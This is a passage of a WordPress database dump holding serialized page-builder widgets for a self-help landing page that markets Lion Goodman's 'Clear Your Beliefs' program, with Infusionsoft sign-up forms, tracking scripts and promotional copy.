name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1124:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"</div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div></form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1299, 1760, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:258:"<center>\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1953:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1124:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"</div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div></form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1300, 1761, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:233:"<center>\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1407:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-1st-p" style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1980:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1149:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"</div>\n<p class="tri-panel-3rd-p" style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your 